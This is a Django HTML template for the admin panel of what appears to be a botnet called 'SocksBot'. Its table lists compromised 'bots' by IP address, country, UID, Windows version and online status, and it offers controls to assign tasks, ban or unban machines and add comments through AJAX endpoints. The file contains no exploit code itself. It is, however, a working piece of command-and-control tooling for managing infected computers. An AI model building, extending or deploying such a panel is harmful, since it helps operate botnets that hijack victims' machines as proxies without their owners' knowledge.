<!DOCTYPE html>
<html lang="en">
<head>
    {% load static %}
 
    <meta charset="utf-8">
    <title>SocksBot - Bots</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="Adminka">


    <script src="https://code.jquery.com/jquery-3.4.1.js"></script>
    <link id="bs-css" href="{% static 'table/css/bootstrap-cyborg.min.css' %}" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="{% static 'table/css/bootstrap-slate.min.css' %}">
    <link href="{% static 'table/css/charisma-app.css' %}" rel="stylesheet">
    <link href='{% static "table/bower_components/fullcalendar/dist/fullcalendar.css" %}' rel='stylesheet'>
    <link href='{% static "table/bower_components/fullcalendar/dist/fullcalendar.print.css" %}' rel='stylesheet' media='print'>
    <link href='{% static "table/bower_components/chosen/chosen.min.css' rel='stylesheet" %}'>
    <link href='{% static "table/bower_components/colorbox/example3/colorbox.css" %}' rel='stylesheet'>
    <link href='{% static "table/bower_components/responsive-tables/responsive-tables.css" %}' rel='stylesheet'>
    <link href='{% static "table/bower_components/bootstrap-tour/build/css/bootstrap-tour.min.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/jquery.noty.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/noty_theme_default.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/elfinder.min.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/elfinder.theme.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/jquery.iphone.toggle.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/uploadify.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/animate.min.css" %}' rel='stylesheet'>

  <link rel="icon" href="favicon.ico" type="image/x-icon">
    <script src="{% static 'table/bower_components/jquery/jquery.min.js' %}"></script>

   
 

</head>

<body>
 
    <div class="navbar navbar-default" role="navigation">

        <div class="navbar-inner">
            <button type="button" class="navbar-toggle pull-left animated flip">
                <span class="sr-only">Toggle navigation</span>
               
            </button>
         

            <div class="btn-group pull-right">
                <button class="btn btn-default dropdown-toggle" data-toggle="dropdown">
                    <i class="glyphicon glyphicon-user"></i><span class="hidden-sm hidden-xs"> admin</span>
                    <span class="caret"></span>
                </button>
                <ul class="dropdown-menu">
                
                    <li class="divider"></li>
                    <li><a onclick="logout()">Logout</a></li>
                </ul>
            </div>
         
            <div class="btn-group pull-right theme-container animated tada">
                <ul class="dropdown-menu" id="themes">

                    <li><a data-value="slate" href="#"><i class="whitespace"></i> Seriy</a></li>
                    <li><a data-value="cyborg" href="#"><i class="whitespace"></i> Cherni</a></li>
              
                   
               
                </ul>
            </div>
         

        

        </div>
    </div>
 
<div class="ch-container">
    <div class="row">
        
        
        <div class="col-sm-2 col-lg-2">
            <div class="sidebar-nav">
                <div class="nav-canvas">
                    <div class="nav-sm nav nav-stacked">

                    </div>
                   <ul class="nav nav-pills nav-stacked main-menu">
                        <li class="nav-header">Main</li>
                        <li><a class="ajax-link" href="{% url 'main_page' %}"><i class="glyphicon glyphicon-home"></i><span> Main Page</span></a>
                            <li><a class="ajax-link" ><i class="glyphicon glyphicon-home"></i><span> Bots</span></a>
                                <li><a class="ajax-link" href="{% url 'admin_table' %}"><i class="glyphicon glyphicon-home"></i><span> Tasks</span></a>
                        </li>
                                <li><a class="ajax-link" href="{% url 'sessions_page' %}"><i class="glyphicon glyphicon-home"></i><span> Sessions </span></a>
                                    <li><a class="ajax-link" href="{% url 'settings_page' %}"><i class="glyphicon glyphicon-home"></i><span> Settings</span></a>
                                    </li>
                        
                </div>
            </div>
        </div>
        </noscript>

        <div id="content" class="col-lg-10 col-sm-10">
          
            <div>
    <ul class="breadcrumb">
        <li>
            <a href="#">Home</a>
        </li>
        <li>
            <a href="#">Bots</a>
        </li>
    </ul>
</div>
 <div class="row">
    <div class="box col-md-12">
    <div class="box-inner">
    <div class="box-header well" data-original-title="">
        <h2><i class="glyphicon glyphicon-user"></i>Bots</h2>

   
    </div>
    <div class="box-content">
    <div class="alert alert-info"> <a href="http://datatables.net/" target="_blank"></a>

<input type="text"  placeholder ="Search" class="boxi" name="" id="search">
    </div>
    <table class="table table-striped table-bordered bootstrap-datatable datatable responsive">
    <thead>
    <tr>
        <th>IP</th>
<th>Country</th>
        <th>UID</th>
        <th>OS</th>
         <th>Arch</th>
        <th>Status</th>
        <th>Additional</th>

    </tr>
    </thead>
    <tbody>
    {% for bot in bots %}
    <tr>
        <td>{{bot.ip}}</td>
            <td class="center"><img class="flag" src="/static/table/flags-mini/{{bot.country|safe}}.png"> {{bot.country}}</td>
        <td class="center">{{bot.uid}}</td>
        
        {% if bot.is_win7 %}
        <td class="center">Windows 7</td>
        {% elif bot.is_win81 %}
        <td class="center">Windows 8.1</td>
        {% elif bot.is_win8 %}
        <td class="center">Windows 8</td>
        {% elif bot.is_win10 %}
        <td class="center">Windows 10</td>
        {% elif bot.is_win11 %}
        <td class="center">Windows 11</td>
        {% elif bot.is_server2012 %}
        <td class="center">Windows Server 2012</td>
        {% elif bot.is_server2012r2 %}
        <td class="center">Windows Server 2012 R2</td>
        {% endif %}

        {% if bot.is_x64 %}
        <td class="center">64X</td>
        {% else %}
        <td class="center">32X</td>
        {% endif %}

        <td class="center">
            {% if bot.is_banned %}
            <span class="label-default label label-danger" id='sp-{{bot.uid}}'>Banned</span>
            {% else %}
            <span class="label-success label label-default" id='sp-{{bot.uid}}'>Active</span>
            {% endif %}

            {% if not bot.is_online %}
            <span class="label-success label label-brous">Ofline</span>
            {% else %}
            <span class="label-success label label-default">Online</span>
            {% endif %}

        </td>
        <style type="text/css">
            .grenocol{
background-color:#469146;
color: white;
}
        </style>
        <td class="center">
            <a class="btn btn-info" href="{% url 'task' %}">
                <i class="glyphicon glyphicon-edit icon-white"></i>
               Task
            </a>
            {% if bot.is_banned is False %}
            <a class="btn btn-danger" onclick="block_unblock(this); return false;" type="block" id={{bot.uid}} href="#">
                <i class="glyphicon glyphicon-trash icon-white" id='i-{{bot.uid}}'></i>Block 
            </a>
            {% else %}

            <a class="btn grenocol" onclick="block_unblock(this); return false;" type="unblock" id='{{bot.uid}}' href="#">
                <i class="label-success label label-default" id="i-{{bot.uid}}"></i>Unblock 
            </a>

            {% endif %}
                
                <input type="text"  placeholder ="{{bot.comment}}" class="boxir" id="comment{{bot.uid}}" id1="search">
                
                <a id={{bot.uid}} onclick="add_comment(this);" class="btn btn-romus" href="#">
                
                <i class="
glyphicon glyphicon-send icon-white"></i>
                comment
            </a>
        </td>
    </tr>

    {% endfor %}
    
    </tbody>
    </table>
    </div>
    </div>
    </div>
    <!--/span-->

    </div><!--/row-->

    
<style type="text/css">
    .rfjd{
background-color: red;
    }
</style>


<script src="{% static 'table/bower_components/bootstrap/dist/js/bootstrap.min.js' %}"></script>
<script src="{% static 'table/js/jquery.cookie.js' %}"></script>
<script src="{% static 'table/bower_components/moment/min/moment.min.js' %}"></script>
<script src="{% static 'table/bower_components/fullcalendar/dist/fullcalendar.min.js' %}"></script>
<script src="{% static 'table/js/jquery.dataTables.min.js' %}"></script>
<script src="{% static 'table/bower_components/chosen/chosen.jquery.min.js' %}"></script>
<script src="{% static 'table/bower_components/colorbox/jquery.colorbox-min.js' %}"></script>
<script src="{% static 'table/js/jquery.noty.js' %}"></script>
<script src="{% static 'table/bower_components/responsive-tables/responsive-tables.js' %}"></script>
<script src="{% static 'table/bower_components/bootstrap-tour/build/js/bootstrap-tour.min.js' %}"></script>
<script src="{% static 'table/js/jquery.raty.min.js' %}"></script>
<script src="{% static 'table/js/jquery.iphone.toggle.js' %}"></script>
<script src="{% static 'table/js/jquery.autogrow-textarea.js' %}"></script>
<script src="{% static 'table/js/jquery.uploadify-3.1.min.js' %}"></script>
<script src="{% static 'table/js/jquery.history.js' %}"></script>
<script src="{% static 'table/js/charisma.js' %}"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/Chart.js/3.6.0/chart.min.js"></script>
<script type="text/javascript">
    function add_comment(el) {
        uid = el.id
        elem = document.getElementById('comment' + uid).value
        console.log(elem)
        $.ajax({
            url: '/add-comment/',
            type: 'post',
            data: {uid: uid, comment: elem},
            dataType: 'html',
        })

    }

        function logout() {
        $.ajax({
            url: '/logout/',
            type: 'get',
            data: {},
            dataType: 'html',
            success: function(data){
                const json = data
                const response = JSON.parse(json);
                if (response.v == '200') {
                    window.location.href = '/login/'
                }
            }

        })
    }

    function block_unblock(el) {
        console.log(el.type)

        if (el.type == 'block') {
            uid = el.id;

            $.ajax({
            url: '/ban/',
            type: 'post',
            data: {uid: uid},
            dataType: 'html',
            success: function(data){
                json = data
                response = JSON.parse(json)
                if (response.v == '200') {
                    el_1 = document.getElementById('i-' + uid);
                    
                    el.textContent = 'Unblock';
                    el.className = 'btn grenocol';
                    sp = document.getElementById('sp-' + uid);
                    sp.className = 'label-default label label-danger';
                    sp.textContent = 'Banned';
                    el.type = 'unblock';
                }
            }
        })
        }
         else {
            uid = el.id;

        $.ajax({
            url: '/unban/',
            type: 'post',
            data: {uid: uid},
            dataType: 'html',
            success: function(data){
                json = data
                response = JSON.parse(json)
                if (response.v == '200') {
                    el_1 = document.getElementById('i-' + uid);
                    
                    el.textContent = 'Block';
                    el.className = 'btn btn-danger';
                    sp = document.getElementById('sp-' + uid);
                    sp.className = 'label-success label label-default';
                    sp.textContent = 'Active';
                    el.type = 'block';
                }
            }
        })
    }}



</script>
</body>
</html>
